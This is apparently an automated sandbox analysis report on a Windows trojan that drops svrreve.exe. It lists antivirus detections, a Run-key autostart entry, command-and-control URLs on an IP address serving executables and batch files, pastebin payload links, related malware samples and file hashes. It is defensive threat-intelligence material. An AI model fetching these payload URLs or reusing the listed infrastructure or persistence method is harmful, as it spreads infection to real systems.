• svrreve.exe (started by ubes6SC7Vd.exe): pastebin.com 172.67.19.24, 443, 49755 (CLOUDFLARENETUS United States); 172.86.105.109, 49759, 80 (PONYNETUS United States); signatures: Antivirus detection for dropped file, Multi AV Scanner detection for dropped file, Machine Learning detection for dropped file, Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent); started WerFault.exe
• cmd.exe: Uses whoami command line tool to query computer and username; started conhost.exe, timeout.exe (graph counter 1), whoami.exe (graph counter 1)

Source / Detection / Scanner / Label
• ubes6SC7Vd.exe: 56%, Virustotal
• ubes6SC7Vd.exe: 45%, ReversingLabs, Win32.Trojan.Generic
• ubes6SC7Vd.exe: 100%, Avira, TR/Spy.Gen8
• ubes6SC7Vd.exe: 100%, Joe Sandbox ML
Source / Detection / Scanner / Label
• C:\ProgramData\uovan\svrreve.exe: 100%, Avira, TR/Spy.Gen8
• C:\ProgramData\uovan\svrreve.exe: 100%, Joe Sandbox ML
• C:\ProgramData\uovan\svrreve.exe: 45%, ReversingLabs, Win32.Trojan.Generic
• C:\ProgramData\uovan\svrreve.exe: 56%, Virustotal
                          No Antivirus matches
Source / Detection / Scanner / Label
• ipwhois.app: 0%, Virustotal
• pastebin.com: 0%, Virustotal
Source / Detection / Scanner / Label
• http://upx.sf.net: 0%, URL Reputation, safe
• http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name: 0%, URL Reputation, safe
• http://ipwhois.app: 0%, Avira URL Cloud, safe
• https://pastebin.com/raw/fR7B5m9EP: 0%, Avira URL Cloud, safe
• https://pastebin.com/raw/fR7B5m9E: 0%, Avira URL Cloud, safe
• https://github.com/clap-rs/clap/issuesC:: 0%, Avira URL Cloud, safe
• https://ipwhois.app/xml/: 0%, Avira URL Cloud, safe
• https://pastebin.com/raw/fR7B5m9EX: 0%, Avira URL Cloud, safe
• http://172.86.105.109: 0%, Avira URL Cloud, safe
• https://ipwhois.app/xml/: 0%, Virustotal
• http://ipwhois.app: 0%, Virustotal
• https://pastebin.com/raw/fR7B5m9EP: 1%, Virustotal
• https://github.com/clap-rs/clap/issuesC:: 0%, Virustotal
• http://ipwhois.app/xml/: 0%, Avira URL Cloud, safe
• https://pastebin.com/raw/fR7B5m9E: 2%, Virustotal
• http://172.86.105.109(f: 0%, Avira URL Cloud, safe
• http://172.86.105.109/ups/ddttd.exe: 0%, Avira URL Cloud, safe
• http://172.86.105.109: 1%, Virustotal
• https://github.com/clap-rs/clap/issues/rustc/84c898d65adf2f39a5a98507f1fe0ce10a2b8dbc: 0%, Avira URL Cloud, safe
• http://ipwhois.app/xml/: 0%, Virustotal
• http://172.86.105.109/hook/upgrade.php2: 0%, Avira URL Cloud, safe
• http://172.86.105.109/hook/upgrade.php: 0%, Avira URL Cloud, safe
• http://172.86.105.109/ups/ddttd.exe: 1%, Virustotal
• https://github.com/clap-rs/clap/issues: 0%, Avira URL Cloud, safe
• http://172.86.105.109/ups/Snup.bat: 0%, Avira URL Cloud, safe
• https://github.com/clap-rs/clap/issues/rustc/84c898d65adf2f39a5a98507f1fe0ce10a2b8dbc: 0%, Virustotal
• http://pastebin.com: 0%, Avira URL Cloud, safe
• http://172.86.105.109/hook/upgrade.php: 1%, Virustotal
• https://github.com/clap-rs/clap/issues: 0%, Virustotal
• https://pastebin.com: 0%, Avira URL Cloud, safe
• https://pastebin.com/raw/fR7B5m9EX: 1%, Virustotal
• https://cdn.ipwhois.io/flags/us.svg: 0%, Avira URL Cloud, safe
• http://172.86.105.109/ups/Snup.bat: 1%, Virustotal
• https://docs.rs/getrandom#nodejs-es-module-supportCalling: 0%, Avira URL Cloud, safe
• https://ipwhois.app: 0%, Avira URL Cloud, safe
• https://pastebin.com: 0%, Virustotal
• http://pastebin.com: 0%, Virustotal
• https://cdn.ipwhois.io/flags/us.svg: 0%, Virustotal
• https://docs.rs/getrandom#nodejs-es-module-supportCalling: 0%, Virustotal
• https://ipwhois.app: 0%, Virustotal
Name / IP / Active / Malicious / Antivirus Detection / Reputation
• ipwhois.app (195.201.57.90): active true, malicious false, reputation unknown
• pastebin.com (172.67.19.24): active true, malicious true, reputation unknown
Name / Malicious / Antivirus Detection / Reputation
https://ipwhois.app/xml/: malicious false
• Virustotal: 0%
• Avira URL Cloud: safe
Reputation: unknown
https://pastebin.com/raw/fR7B5m9E: malicious false
• Virustotal: 2%
• Avira URL Cloud: safe
Reputation: unknown
http://ipwhois.app/xml/: malicious false
• Virustotal: 0%
• Avira URL Cloud: safe
Reputation: unknown
http://172.86.105.109/hook/upgrade.php: malicious false
• Virustotal: 1%
• Avira URL Cloud: safe
Reputation: unknown
Name / Source / Malicious / Antivirus Detection / Reputation
http://ipwhois.app (source: ubes6SC7Vd.exe, 00000000.00000002.1857818205.00000258800B0000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.000002588025F000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.0000025880206000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.000002588028C000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.000002588022F000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.00000258801D9000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.00000258801A9000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.0000025880180000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0F49000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0FFF000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0F06000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0FCF000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0E50000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0FA6000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC102C000.00000004.00000800.00020000.00000000.sdmp): malicious false
• Virustotal: 0%
• Avira URL Cloud: safe
Reputation: unknown
https://github.com/clap-rs/clap/issuesC: (source: svrreve.exe.0.dr): malicious false
• Virustotal: 0%
• Avira URL Cloud: safe
Reputation: unknown
https://pastebin.com/raw/fR7B5m9EP (source: svrreve.exe, 00000002.00000002.2289800804.0000026DC0EFB000.00000004.00000800.00020000.00000000.sdmp): malicious false
• Virustotal: 1%
• Avira URL Cloud: safe
Reputation: unknown
http://172.86.105.109 (source: svrreve.exe, 00000002.00000002.2289800804.0000026DC0F06000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0E76000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, svrreve.exe.0.dr): malicious false
• Virustotal: 1%
• Avira URL Cloud: safe
Reputation: unknown
https://pastebin.com/raw/fR7B5m9EX (source: ubes6SC7Vd.exe, 00000000.00000002.1857818205.0000025880001000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0DA1000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000009.00000002.2301901265.000001DD56A61000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 0000000D.00000002.2276827527.000001B08F751000.00000004.00000800.00020000.00000000.sdmp): malicious false
• Virustotal: 1%
• Avira URL Cloud: safe
Reputation: unknown
http://172.86.105.109(f (source: svrreve.exe, 00000002.00000002.2289800804.0000026DC0F06000.00000004.00000800.00020000.00000000.sdmp): malicious false
• Avira URL Cloud: safe
Reputation: unknown
http://172.86.105.109/ups/ddttd.exe (source: ubes6SC7Vd.exe, svrreve.exe.0.dr): malicious false
• Virustotal: 1%
• Avira URL Cloud: safe
Reputation: unknown
http://upx.sf.net (source: Amcache.hve.17.dr): malicious false
• URL Reputation: safe
Reputation: unknown
https://github.com/clap-rs/clap/issues/rustc/84c898d65adf2f39a5a98507f1fe0ce10a2b8dbc (source: ubes6SC7Vd.exe, svrreve.exe.0.dr): malicious false
• Virustotal: 0%
• Avira URL Cloud: safe
Reputation: unknown
http://172.86.105.109/hook/upgrade.php2 (source: svrreve.exe, 00000002.00000002.2289800804.0000026DC0F06000.00000004.00000800.00020000.00000000.sdmp): malicious false
• Avira URL Cloud: safe
Reputation: unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name (source: ubes6SC7Vd.exe, 00000000.00000002.1857818205.0000025880097000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0E3A000.00000004.00000800.00020000.00000000.sdmp): malicious false
• URL Reputation: safe
Reputation: unknown
https://github.com/clap-rs/clap/issues (source: svrreve.exe.0.dr): malicious false
• Virustotal: 0%
• Avira URL Cloud: safe
Reputation: unknown
http://172.86.105.109/ups/Snup.bat (source: ubes6SC7Vd.exe, svrreve.exe.0.dr): malicious false
• Virustotal: 1%
• Avira URL Cloud: safe
Reputation: unknown
http://pastebin.com (source: svrreve.exe, 00000002.00000002.2289800804.0000026DC0F06000.00000004.00000800.00020000.00000000.sdmp): malicious false
• Virustotal: 0%
• Avira URL Cloud: safe
Reputation: unknown
https://pastebin.com (source: svrreve.exe, 00000002.00000002.2289800804.0000026DC0F06000.00000004.00000800.00020000.00000000.sdmp): malicious false
• Virustotal: 0%
• Avira URL Cloud: safe
Reputation: unknown
https://cdn.ipwhois.io/flags/us.svg (source: svrreve.exe, 00000002.00000002.2289800804.0000026DC102C000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0FFB000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0FEB000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0F65000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0E71000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0EE3000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC1018000.00000004.00000800.00020000.00000000.sdmp): malicious false
• Virustotal: 0%
• Avira URL Cloud: safe
Reputation: unknown
https://docs.rs/getrandom#nodejs-es-module-supportCalling (source: svrreve.exe.0.dr): malicious false
• Virustotal: 0%
• Avira URL Cloud: safe
Reputation: unknown
https://ipwhois.app (source: ubes6SC7Vd.exe, 00000000.00000002.1857818205.000002588025F000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.0000025880206000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.000002588028C000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.000002588022F000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.00000258801D9000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.0000025880103000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.00000258801A9000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.0000025880097000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.0000025880180000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0E46000.00000004.00000800.00020000.00000000.sdmp): malicious false
• Virustotal: 0%
• Avira URL Cloud: safe
Reputation: unknown
IP / Domain / Country / ASN / ASN Name / Malicious
• 172.86.105.109: domain unknown, United States, ASN 53667 PONYNETUS, malicious false
• 172.67.19.24: pastebin.com, United States, ASN 13335 CLOUDFLARENETUS, malicious true
• 195.201.57.90: ipwhois.app, Germany, ASN 24940 HETZNER-ASDE, malicious false
                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1462351
                          Start date and time:2024-06-25 14:54:42 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 6m 38s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:19
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:ubes6SC7Vd.exe
                          renamed because original name is a hash value
                          Original Sample Name:f8880a50a9423afac856607f3a7a9759ce580fd71e8d92d480e6ec32a52378cb.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@16/18@2/3
                          EGA Information:
                          • Successful, ratio: 25%
                          HCA Information:
                          • Successful, ratio: 86%
                          • Number of executed functions: 57
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 52.182.143.212
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target svrreve.exe, PID 7924 because it is empty
                          • Execution Graph export aborted for target svrreve.exe, PID 8076 because it is empty
                          • Execution Graph export aborted for target ubes6SC7Vd.exe, PID 7268 because it is empty
• Not all processes were analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • Report size getting too big, too many NtSetInformationFile calls found.
Time / Type / Description
• 08:55:42, API Interceptor: 78x Sleep call for process: ubes6SC7Vd.exe modified
• 08:55:56, API Interceptor: 162x Sleep call for process: svrreve.exe modified
• 08:56:33, API Interceptor: 3x Sleep call for process: WerFault.exe modified
• 13:56:04, Autostart: Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Xohtsts "C:\ProgramData\uovan\svrreve.exe"
• 13:56:13, Autostart: Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Xohtsts "C:\ProgramData\uovan\svrreve.exe"
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          172.67.19.24Invoice Payment N8977823.jsGet hashmaliciousWSHRATBrowse
                          • pastebin.com/raw/NsQ5qTHr
                          Pending_Invoice_Bank_Details_XLSX.jsGet hashmaliciousWSHRATBrowse
                          • pastebin.com/raw/NsQ5qTHr
                          Dadebehring PendingInvoiceBankDetails.JS.jsGet hashmaliciousWSHRATBrowse
                          • pastebin.com/raw/NsQ5qTHr
                          PendingInvoiceBankDetails.JS.jsGet hashmaliciousWSHRATBrowse
                          • pastebin.com/raw/NsQ5qTHr
                          195.201.57.90cOQD62FceM.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                          • /?output=json
                          Clipper.exeGet hashmaliciousUnknownBrowse
                          • /?output=json
                          cOQD62FceM.exeGet hashmaliciousLuca StealerBrowse
                          • /?output=json
                          Cryptor.exeGet hashmaliciousLuca StealerBrowse
                          • /?output=json
                          Cryptor.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                          • /?output=json
                          rust-stealer-xss.exeGet hashmaliciousDiscord Token Stealer, Luca StealerBrowse
                          • /?output=json
                          Build.exeGet hashmaliciousLuca Stealer, QuasarBrowse
                          • /?output=json
                          rust-stealer-xss.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                          • /?output=json
                          3r3usOVGsa.exeGet hashmaliciousBlackGuardBrowse
                          • ipwhois.app/xml/
                          KvVXVfYvlF.exeGet hashmaliciousBlackGuard, SmokeLoaderBrowse
                          • ipwhois.app/xml/
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          pastebin.comd43YUxXAW7.exeGet hashmaliciousDCRatBrowse
                          • 104.20.4.235
                          IlWPStOFHj.rtfGet hashmaliciousRemcosBrowse
                          • 104.20.4.235
                          V8ZnJcPOUY.rtfGet hashmaliciousHTMLPhisherBrowse
                          • 104.20.4.235
                          A24-00342B139336 #TW_Inquiry.xlsGet hashmaliciousSmokeLoaderBrowse
                          • 104.20.4.235
                          LgTFM1JlJu.rtfGet hashmaliciousAgentTeslaBrowse
                          • 104.20.4.235
                          invoice.exeGet hashmaliciousMinerDownloader, RedLine, XmrigBrowse
                          • 172.67.19.24
                          Galaxy Swapper v2.0.3.exeGet hashmaliciousLummaC, XmrigBrowse
                          • 104.20.3.235
                          0xkcWr1hvs.exeGet hashmaliciousDCRatBrowse
                          • 104.20.4.235
                          AbvmEnagz3.exeGet hashmaliciousDCRatBrowse
                          • 104.20.3.235
                          xworm.exeGet hashmaliciousXWormBrowse
                          • 172.67.19.24
                          ipwhois.appSecuriteInfo.com.FileRepMalware.9397.20651.exeGet hashmaliciousUnknownBrowse
                          • 15.204.213.5
                          CbLQcrwzUi.exeGet hashmaliciousUnknownBrowse
                          • 15.204.213.5
                          AYReport_EN.exeGet hashmaliciousBlackGuardBrowse
                          • 15.204.213.5
                          Fortnite_CHEAT_CRACKED.exeGet hashmaliciousUnknownBrowse
                          • 108.181.47.111
                          3r3usOVGsa.exeGet hashmaliciousBlackGuardBrowse
                          • 195.201.57.90
                          KvVXVfYvlF.exeGet hashmaliciousBlackGuard, SmokeLoaderBrowse
                          • 195.201.57.90
                          file.exeGet hashmaliciousBlackGuardBrowse
                          • 195.201.57.90
                          file.exeGet hashmaliciousBlackGuardBrowse
                          • 195.201.57.90
                          file.exeGet hashmaliciousBlackGuardBrowse
                          • 195.201.57.90
                          JFBYfxYeTO.exeGet hashmaliciousBlackGuardBrowse
                          • 195.201.57.90
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          PONYNETUSxgYRAaym6l.exeGet hashmaliciousUnknownBrowse
                          • 104.194.134.68
                          Po-6528279-SK.xlsGet hashmaliciousAgentTeslaBrowse
                          • 198.251.88.167
                          https://messengeravl-my.sharepoint.com/:b:/p/joe/ESmpVXV4LaVIg3kfinawWKsBp8BjLcpEjCZgutNWEl7T3g?e=dXSYQsGet hashmaliciousHTMLPhisherBrowse
                          • 104.194.149.21
                          1.exeGet hashmaliciousUnknownBrowse
                          • 104.194.143.5
                          1.exeGet hashmaliciousUnknownBrowse
                          • 104.194.143.5
                          1.exeGet hashmaliciousUnknownBrowse
                          • 104.194.143.5
                          1.exeGet hashmaliciousUnknownBrowse
                          • 104.194.143.5
                          A24-00342B139336 #TW_Inquiry.xlsGet hashmaliciousSmokeLoaderBrowse
                          • 198.251.88.167
                          temp_2312.pdf.exeGet hashmaliciousDanaBotBrowse
                          • 104.194.143.5
                          temp_2312.pdf.exeGet hashmaliciousDanaBotBrowse
                          • 104.194.143.5
                          HETZNER-ASDEfile.exeGet hashmaliciousVidarBrowse
                          • 168.119.115.138
                          MT103-7543324334hsbc.com.exeGet hashmaliciousRemcosBrowse
                          • 138.201.150.244
                          BEfVzgLE2x.dllGet hashmaliciousRedLineBrowse
                          • 78.47.64.127
                          FACTURA08798696.vbeGet hashmaliciousGuLoader, RemcosBrowse
                          • 138.201.150.244
                          A7eSEifPRD.exeGet hashmaliciousUnknownBrowse
                          • 49.12.121.47
                          A7eSEifPRD.exeGet hashmaliciousUnknownBrowse
                          • 49.12.121.47
                          yq5xNPpWCT.exeGet hashmaliciousPureLog Stealer, SystemBCBrowse
                          • 78.47.2.70
                          Associated Sample Name / URL: https://web.gvpdemo.com/auth/realms/vault/login-actions/action-token?key=eyJhbGciOiJIUzUxMiIsInR5cCIgOiAiSldUIiwia2lkIiA6ICJiNTlmOTRhNS1lNTIyLTQ4ZTYtYTVlNy0wZDUzNjMxYTNhY2QifQ.….X3XXXUWQADuhXGHJhhCPXtpRSyB0lUwg6O8SGQ7zySPbWflQddcAjYFrnXlNtaQuXOoHGSqnIE7LmQ1CAC4uxg, Detection: malicious, Threat Name: Unknown
                          • 188.40.28.5
                          Associated Sample Name / URL: T4LJO0xbse.exe, Detection: malicious, Threat Name: Quasar
                          • 195.201.57.90
                          Associated Sample Name / URL: pli6MTVsRr.elf, Detection: malicious, Threat Name: Mirai
                          • 5.75.234.233
                          Match: CLOUDFLARENETUS, Associated Sample Name / URL: SecuriteInfo.com.Win64.Malware-gen.9165.26289.exe, Detection: malicious, Threat Name: Unknown
                          • 104.21.95.147
                          Associated Sample Name / URL: https://service.ringcentral.com@reflexlogisticsllc.com/access/auth/3uacfw56k2anhclxj/ZnJhbi5yZWlzQGNhYmluZXR3b3Jrc2dyb3VwLmNvbQ==, Detection: malicious, Threat Name: HTMLPhisher
                          • 188.114.96.3
                          Associated Sample Name / URL: Techno_PO LV12406-003211.xla.xlsx, Detection: malicious, Threat Name: Unknown
                          • 172.67.148.197
                          Associated Sample Name / URL: https://9vn.lagerpec.com/N3pd9/, Detection: malicious, Threat Name: HTMLPhisher
                          • 188.114.96.3
                          Associated Sample Name / URL: https://c4acj123.caspio.com/dp/dabfd000f7918b16918d49aa94aa, Detection: malicious, Threat Name: Unknown
                          • 1.1.1.1
                          Associated Sample Name / URL: http://andreolacentralhotel.info/4498942116, Detection: malicious, Threat Name: Unknown
                          • 104.17.25.14
                          Associated Sample Name / URL: WBK project specifications WB174482021.html, Detection: malicious, Threat Name: HTMLPhisher
                          • 188.114.96.3
                          Associated Sample Name / URL: https://www.winhelponline.com/blog/microsoft-edge-url-shortcut/, Detection: malicious, Threat Name: HTMLPhisher
                          • 104.22.4.69
                          Associated Sample Name / URL: QscottEFT Payment Remittance #11782.html, Detection: malicious, Threat Name: HTMLPhisher
                          • 172.64.151.101
                          Associated Sample Name / URL: https://silk-proximal-fortnight.glitch.me#a2V2aW4ucm9sbGVyQHNhaWMuY29t, Detection: malicious, Threat Name: HTMLPhisher
                          • 188.114.96.3
                          Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                          Match: 3b5074b1b5d032e5620f69f9f700ff0e, Associated Sample Name / URL: SecuriteInfo.com.Win64.Malware-gen.9165.26289.exe, Detection: malicious, Threat Name: Unknown
                          • 172.67.19.24
                          • 195.201.57.90
                          Associated Sample Name / URL: https://service.ringcentral.com@reflexlogisticsllc.com/access/auth/3uacfw56k2anhclxj/ZnJhbi5yZWlzQGNhYmluZXR3b3Jrc2dyb3VwLmNvbQ==, Detection: malicious, Threat Name: HTMLPhisher
                          • 172.67.19.24
                          • 195.201.57.90
                          Associated Sample Name / URL: https://silk-proximal-fortnight.glitch.me#a2V2aW4ucm9sbGVyQHNhaWMuY29t, Detection: malicious, Threat Name: HTMLPhisher
                          • 172.67.19.24
                          • 195.201.57.90
                          Associated Sample Name / URL: ManualsViewer-v3.3.1222.0_49700000.msi, Detection: malicious, Threat Name: Unknown
                          • 172.67.19.24
                          • 195.201.57.90
                          Associated Sample Name / URL: https://drive.google.com/file/d/1CrwYox8X3b4CkAOtlNJvWfIGwcPeyZn4/view?usp=sharing_eip_m&ts=667a04a5, Detection: malicious, Threat Name: Unknown
                          • 172.67.19.24
                          • 195.201.57.90
                          Associated Sample Name / URL: gdC5AKTv6RiIgyr.exe, Detection: malicious, Threat Name: AgentTesla
                          • 172.67.19.24
                          • 195.201.57.90
                          Associated Sample Name / URL: 0044FIDB240149.exe, Detection: malicious, Threat Name: AgentTesla, PureLog Stealer
                          • 172.67.19.24
                          • 195.201.57.90
                          Associated Sample Name / URL: Payroll List or Salary List.exe, Detection: malicious, Threat Name: AgentTesla
                          • 172.67.19.24
                          • 195.201.57.90
                          Associated Sample Name / URL: https://antiphishing.vadesecure.com/v4?f=Q3ZQNmU2SnpsRFlRbUF3dnXrUX6IVRqoHkav3zS2FUU4SSgWF2Bh53LuIqIaYuHrQDsnYOK56JKj0hXr4VDw6qL5o_uh_nqnyJa_2on34iQ&i=SXVFem5DOGVpUU1rNjdmQs96J83fcHVCxOlJVucRT2c&k=syJL&r=bWt1djZ5QzcyUms5R1Nzas8e2Z1uyQF5dl89S8qefCBSiTlgrr5sTiH-8ESNqzpA&s=28bc277065cef76943ee4a3e64550f59f4824833fcb12a460650a34e741aba3d&u=http%3A%2F%2Ffranceuniv.fr, Detection: malicious, Threat Name: Unknown
                          • 172.67.19.24
                          • 195.201.57.90
                          Associated Sample Name / URL: crypted file.exe, Detection: malicious, Threat Name: AgentTesla, PureLog Stealer
                          • 172.67.19.24
                          • 195.201.57.90
                          No context
                          Process:C:\Windows\System32\WerFault.exe
                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):65536
                          Entropy (8bit):0.967153438027498
                          Encrypted:false
                          SSDEEP:192:4VTerVy7l0W5Q76aKTDdx+zuiF4Z24lO8WQ:mT2yqWe76aMZYzuiF4Y4lO8WQ
                          MD5:C6ED4C0A108214319EDDB061337AE9A7
                          SHA1:170EFEE0DD6721E28088515B3DFC8160B5D482CA
                          SHA-256:2F04301F7291630E8E63B6BD84AC1889244AF57698072734B9785291CED9B475
                          SHA-512:55D02A36ED3A44AAAF9D50AC62A38CA8FBFA2689CEF41A559BDFE430BB00431172F0C8088551A2624DCE46DC361B40358B175FBED2FD86A2D755F59B14EBBA13
                          Malicious:false
                          Reputation:low
                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.3.7.9.3.7.8.1.5.6.3.1.4.2.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.3.7.9.3.7.8.2.0.7.8.7.8.2.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.3.4.c.5.d.4.7.-.7.d.1.7.-.4.f.5.b.-.9.6.3.d.-.9.4.4.6.5.7.b.9.d.c.d.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.3.b.2.0.e.8.9.-.b.3.d.a.-.4.5.8.7.-.b.d.a.8.-.e.7.b.0.e.a.2.9.3.6.f.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.s.v.r.r.e.v.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.p.i.d.g.i.n.s.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.8.c.-.0.0.0.1.-.0.0.1.4.-.c.f.e.a.-.b.6.1.3.f.f.c.6.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.5.2.b.f.2.0.c.c.d.c.a.5.a.2.4.a.8.0.a.5.9.b.3.e.c.6.f.8.b.a.1.0.0.0.0.0.0.0.0.!.0.0.0.0.a.3.5.0.f.7.4.0.3.f.2.5.a.d.d.2.9.a.4.6.4.4.9.1.d.3.7.f.5.6.b.5.3.8.1.d.4.a.7.3.!.s.v.r.r.e.v.e...e.x.e.....T.a.r.g.e.t.
                          Process:C:\Windows\System32\WerFault.exe
                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):65536
                          Entropy (8bit):0.9671639421296586
                          Encrypted:false
                          SSDEEP:192:NQiQrVF7l0W5Q76aKTDdx+zuiF4Z24lO8WQ:misFqWe76aMZYzuiF4Y4lO8WQ
                          MD5:383D7A6EAF851901D3A6909B1E3B8E26
                          SHA1:DB15DA9AEE7711DC584CD3594676D723544E6B1A
                          SHA-256:F29E3A3D595E22CBBC8675AA92FBEB3988FDEFE1F9C51E49A078CD75D28A6A76
                          SHA-512:C421455A619C51B88EDF88BA0CE7D537F3B00E6D960C2B15BC8BCF992357C6CD39BF923A41F0F206D8B3C2937346DBFE00AD6F5365C194CF238AF7504E119B76
                          Malicious:false
                          Reputation:low
